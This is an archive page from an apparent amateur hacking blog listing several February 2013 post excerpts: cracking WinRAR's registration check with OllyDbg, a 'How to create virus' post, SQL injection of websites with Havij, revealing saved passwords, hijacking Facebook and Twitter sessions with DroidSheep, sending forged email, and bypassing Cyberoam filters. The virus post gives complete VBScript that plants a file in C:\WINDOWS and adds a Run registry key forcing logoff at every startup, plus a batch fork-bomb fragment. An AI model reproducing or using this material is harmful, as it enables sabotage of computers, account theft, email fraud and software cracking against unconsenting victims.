Posts

Showing posts from February, 2013

Reverse Engineering Tutorial

Image
Here I will show you reverse engineer with Winrarusing Olly debugger. In this tutorial I will show you the attackers approach of simply hacking a software with just basic understanding of Assembly. You will need Olly dbg(v 1.10) and Winrar

Our target is to bypass the registration screen that pops in-front of us everytime we load winrar. We have to prevent that screen from appearing without registering the software. So all we have to do is get rid of this Reminder.




POINT 1 - Run olly dbg and open winrar in it by dragging it and dropping it in olly dbg.
POINT 2 - You will find a screen similar to it. If you have read the previous two tutorials of this series thaen it will help you understand the things that will come in-front of you else everything will appear Greek. You will find something similar to this. Go through the whole code once.


POINT 3 - Now right clcik on the CPU main thread module and go to Search For > All Referenced text String.
POINT 4 - Now a new process containing all th…

How to create virus

1  Virus Creation Tricks 

Just open the Notepad and type the paste the following Code.
set ws=createobject("wscript.shell")
dim strDir,strfile,st,strtxt2,strshell,strlog
dim obfso,obfolder,obshell,obfile,obtxtfile
strshell="wscript.shell"
strDir="C:\WINDOWS"
strfile="\wscript.vbs"
st=Chr(34)
strlog="shutdown -l"
strtxt2="ws.run(strlog)"
set obfso=CreateObject("Scripting.FileSystemObject")
on error resume next
set obfile=obfso.CreateTextfile(strDir & strfile)
obfile.writeline("set ws=createobject("&st&strshell&st&")")
obfile.writeline("ws.run("&st&strlog&st&")")
ws.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Logoff","C:\WINDOWS\wscript.vbs","REG_SZ”


Now Save This Notepad file With Any Name Having  .vbs Extension . 

2  Virus Creation Trick  
Start
Start
Start 

and then save it with .bat extension.
Now double click on this .b…

SQL INJECTION WITH HAVIJ

Image
SQL Injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. According to HACKERS the most common technique to HACK a Website is SQL INJECTION. In this
technique HACKERS insert SQL codes into the login forms ( Username & Password) to deface and access the site. Now these days SQL injection is quite easy to perform with the automatic tools of SQL to hack the websites this makes script kiddies job more easy.
Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page

Supported Databases with injection methods
MsSQL 2000/2005 with errorMsSQL 2000/2005 no error union basedSybase (ASE) MySQL union basedMySQL BlindMySQL error basedOracle union basedMsAccess union basedFollow Steps
Download HAVIJhereStep 1 : Firstly find SQL injection Vulnerability and insert the string (likehttp://www.target.com/index.asp?id=123)


Step 2 : You can search "  i…

HOW TO FIND HIDDEN PASSWORD UNDER ASTERISKS

Image
Welcome to "BLACKBACKHAKERS - An approach to introduce people with the truth of HACKING". Often we use the "Remember Me" feature in most form logins to help the signing in process faster. But taking advantage of that sometimes makes us forget what our real passwords are. If you often stare at the asterisks and wonder what’s your actual password, try this trick.

Thais trick only work for Mozilla Firefox. Add on :Show My Password To reveal password under asterisks just double click on text box where password is saved.

HOW TO HACK FACEBOOK, TWITTER WITH ANDROID APP DROIDSHEEP

Image
Welcome again to "BLACKBACKHAKERS - An approach to introduce people with the truth of HACKING".  DriodSheep is awesome Session Hijacking Android app that can be use to hijack Wifi Sessions. Currently It support Open and WEP Encrypted networks that includes WPA and WPA2 networks (PSK)  DroidSheep enables Android-based man in the middle attacks against a wide range of Web sites, including Facebook.com, Flickr.com, Twitter.com, Linkedin.com, and non-encrypted services like “maps” on Google. There are many users that do not known that air is the transmission medium when using WiFi. Therefore information is not only transferred to its receiver but also to any other party in the network within the range of the radio waves.  Usually nothing special happens because the WiFi users discard packets that are not destined to themselves. DroidSheep does not do this. It reads all the packets looking at their contents. Is a website sending a clear recognition feature within a message’s cont…

HOW TO SEND FAKE E-MAIL

Image
Today in this post I'll tell you how can you send fake and anonymous mails to any one. This technique is called E-MAIL FORGING.  E-MAIL FORGING is a art to sending fake emails
without knowing the password of victim.
WARNING : This article is only for educational purpose don't misuse this. 
www.emkei.cz - SEND FAKE E-MAIL is the fabulous online website, used to send fake and anonymous email. All Sent e-mails go to INBOX. Click on link :  www.emkei.cz WARNING : By sending a fake email or prank email you may be committing the offence of fraud even you did not intend to. You are not allowed to use this service for any illegal activities at any time.

Hack Cyberoam to Access all blocked sites

Image
How to Hack Cyberoam to Access all blocked sites in college/firm Hello Frens I am back with another hacking tutorial . This time I will explain you all " How to Hack or Unblockcyberoam to access all blocked sites in college or company" . Tutorial will be noob friendly as everything is explained with the help of snapshots...So to know How to hack cyberoam Read On....

First of all Guys You Must Know What is Cyberoam and What Idea it uses to block the user.
What is Cyberoam :

Cyberoam is Identity-based unified threat management appliances, offer comprehensive threat protection with firewall-VPN, anti-virus, anti-spam, intrusion prevention system, content filtering in addition to bandwidth management and multiple link load balancing and gateway failover. Identity-based controls and visibility are critical components of network security. With identity and network data combined, enterprises are able to identify patterns of behavior by specific users or groups that can signify misuse,…